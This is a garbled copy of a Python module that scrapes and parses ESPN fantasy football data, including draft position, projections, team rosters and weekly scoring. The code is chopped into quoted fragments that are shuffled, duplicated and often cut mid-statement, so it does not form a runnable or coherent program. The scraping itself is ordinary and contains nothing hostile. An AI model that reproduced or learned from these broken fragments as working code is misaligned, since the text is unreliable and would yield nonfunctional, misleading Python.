=", "link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match:", "return players @staticmethod def team_roster(content): \"\"\" Parses team roster page into list of", "len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2]", "import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from", "parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper", "else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args:", "2018, 2019, etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content)", "\"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\",", "6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12:", "does include some basic fantasy data # espn_fantasy is mostly about managing fantasy", "str qb, rb, wr, te, k, etc. season_year: int 2017, 2016 week: int", "f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all", "Gets page with all players by position Args: pos(str): qb, rb, wr, te,", "v for k, v in item[\"player\"].items() if k in tl_wanted} for scoring_type in", "tds[2].text # add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses", "row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") #", "\"\"\" Gets list of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF',", "<a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if", "# TODO: adapt for dst results = [] headers = [ \"c_a\", \"pass_yds\",", "soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds =", "# they have attempts/completions in one column so have to remove & split", "page with all players by position Args: pos(str): qb, rb, wr, te, k,", "in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type", "def players_position(content, pos): \"\"\" Parses page of ESPN players by position Args: content:", "link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match:", "rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] =", "class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"):", "module as season approaches \"\"\" import logging import re from bs4 import BeautifulSoup,", "data Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\" content =", "child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly", "]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise", "etc. Returns: str: HTML TODO: rework for new URL \"\"\" poscode = {\"qb\":", "if parser: self._p = parser else: self._p = Parser() def adp(self, season_year): \"\"\"", "pos is valid and uppercase Args: pos(str): Returns: str \"\"\" if pos in", "either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__ == \"__main__\":", "for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\"", "tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")})", "href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link:", "params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"]", "etc. Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return", "soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers", "\"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type", "pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position:", "url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\":", "position (str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework for new URL", "240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not in", "160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos", "} else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week", "value to numeric 0 Args: val: Returns: number \"\"\" if \"--\" in val:", "through stats # they have attempts/completions in one column so have to remove", "scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content,", "set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\":", "match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\",", "tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return players @staticmethod", "child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def", "match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/", "espn_fantasy is mostly about managing fantasy teams # NOTE: trouble accessing data in", "by position Args: content: pos: Returns: list: of dict \"\"\" players = []", "re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) #", "team_roster(content): \"\"\" Parses team roster page into list of player dict Args: content:", "def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML Returns: list:", "player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring", "player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/", "ESPN players by position Args: content: pos: Returns: list: of dict \"\"\" players", "results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self,", "if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] =", "in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos))", "\"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in", "team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com Args: team_code: str", "string Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\")", "\"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player =", "pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset %", "= \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return", "attempts/completions in one column so have to remove & split vals = [self._val(td.text)", "child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results", "= set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\",", "content: pos: Returns: list: of dict \"\"\" players = [] soup = BeautifulSoup(content,", "for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if", "\"proTeamId\", ] api_player = {k: v for k, v in item[\"player\"].items() if k", "for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\",", "link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td>", "scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser", "if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\")", "results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers", "'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def", "through 17 position (str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework for", "pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players", "17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0,", "\"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16,", "BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player", "22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28:", "# add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team", "td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team,", "team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child,", "Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes", "season ADP data Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\"", "weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int):", "tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if", "\"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\":", "dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"):", "{\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1)", "Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\"", "position Args: pos(str): qb, rb, wr, te, k, etc. Returns: str \"\"\" url", "val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of", "players_position(self, pos): \"\"\" Gets page with all players by position Args: pos(str): qb,", "include some basic fantasy data # espn_fantasy is mostly about managing fantasy teams", "results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None,", "120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos", ") return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players by", "row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team, position nametd", "[\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" +", "continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError:", "for dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "1 through 17 position (str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework", "pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page Args: content: HTML", "\"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player", "2016, etc. week (int): 1 through 17 position (str): 'qb', 'wr', etc. Returns:", "5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11:", "\"\"\" Parses ESPN fantasy football season-long sortable projections page Args: content: HTML string", "\"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for", "\"\"\" Gets adp data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\"", "team roster page Returns: list of dict \"\"\" players = [] soup =", "column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass", "season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017,", "season-long sortable projections page Args: content: HTML string Returns: list of dict \"\"\"", "\"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def", "for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif", "0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower()", "\"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", []))", "re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) #", "espn.py # classes for scraping, parsing espn football data # this does include", "4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240,", "27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", }", "for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid", "\"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\",", "uppercase Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\",", "link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content):", "content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for dst results", "= [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\",", "\"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\",", "# tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\"", "Args: pos(str): qb, rb, wr, te, k, etc. Returns: str \"\"\" url =", "'wr', etc. Returns: str: HTML TODO: rework for new URL \"\"\" poscode =", "from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\",", "= BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try:", "\"\"\" Parses weekly scoring page for dst Args: content(str): HTML Returns: list: of", "if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]:", "NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string", "for kickers Args: content (str): HTML Returns: list: of dict \"\"\" # TODO:", "Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser() def adp(self, season_year):", "season-long ADP Args: content: Returns: list of dict \"\"\" vals = [] for", "# espn_fantasy is mostly about managing fantasy teams # NOTE: trouble accessing data", "to revisit this module as season approaches \"\"\" import logging import re from", "of dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\",", "tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v", "if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 >", "= \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets", "\"\"\" Parses page of ESPN players by position Args: content: pos: Returns: list:", "\"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com", "params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self,", "approaches \"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString, Tag from", "tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link,", "2017, 2016 week: int 1, 2, 3 offset: int 0, 40, 80, etc.", "item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player", "\"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default", "pos: str qb, rb, wr, te, k, etc. season_year: int 2017, 2016 week:", "scraping, parsing espn football data # this does include some basic fantasy data", "from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string \"\"\" url", "scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper:", "players by position Args: content: pos: Returns: list: of dict \"\"\" players =", "add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster", "url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets", "list of dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted =", "\"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds =", "\"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content,", "child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for", "\"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup =", "self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players by position Args:", "{\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"]", "tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for", "in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val", "tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for row", "remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def", "25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33:", "for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try:", "ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = {", "Args: content: HTML of espn nfl team roster page Returns: list of dict", "elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\":", "zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for", "int 0, 40, 80, etc. Returns: HTML string TODO: revise based on new", "sure pos is valid and uppercase Args: pos(str): Returns: str \"\"\" if pos", "Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None,", "= pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\":", "Args: content: Returns: list of dict \"\"\" vals = [] for item in", "content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page Args: content:", "try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue", "class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\"", "name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if", "parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP data", "\"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\",", "set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\")", "= row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link =", "source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__ ==", "Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent", "player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\"", "player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing tasks", "pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content", "\"\"\" Gets page with projections by position Args: pos: str qb, rb, wr,", "object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler())", "in val: return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP", "10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16:", "link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly", "\"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class", "week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def", "str: HTML TODO: rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\":", "= row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr", "scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p =", "\"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] =", "Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__", "k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]:", "default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else:", "Parses season-long ADP Args: content: Returns: list of dict \"\"\" vals = []", "page Args: content: HTML string Returns: list of dict \"\"\" players = []", "= re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] =", "return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players", "\"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\",", "managing fantasy teams # NOTE: trouble accessing data in offseason # will have", "\"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com", "of ESPN players by position Args: content: pos: Returns: list: of dict \"\"\"", "(int): 2017, 2016, etc. week (int): 1 through 17 position (str): 'qb', 'wr',", "else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else:", "accessing data in offseason # will have to revisit this module as season", "\"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args:", "= tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"])", "Parses team roster page into list of player dict Args: content: HTML of", "k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self,", "'DEN', 'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\")", "TODO: revise based on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\":", "into list of player dict Args: content: HTML of espn nfl team roster", "in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team, position", "of dict \"\"\" # TODO: adapt for dst results = [] headers =", "kickers Args: content (str): HTML Returns: list: of dict \"\"\" # TODO: adapt", "= \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\"", "HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week,", "stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric", "numeric 0 Args: val: Returns: number \"\"\" if \"--\" in val: return 0", "in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: api_player[key] =", "teams # NOTE: trouble accessing data in offseason # will have to revisit", "qb, rb, wr, te, k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return", "= [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\",", "] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds =", "\"\"\" Parses team roster page into list of player dict Args: content: HTML", "if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url =", "https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset,", "20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26:", "tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")})", "page into list of player dict Args: content: HTML of espn nfl team", "scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args:", "\"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\",", "NOTE: trouble accessing data in offseason # will have to revisit this module", "def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. Returns: dict:", "vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long", "in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() == \"k\":", "\"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser:", "child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for", "# tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return players", "slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset))", "return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def", "of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML", "season_year (int): 2017, 2016, etc. week (int): 1 through 17 position (str): 'qb',", "[ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k,", "= link[\"href\"].split(\"/\")[-2] 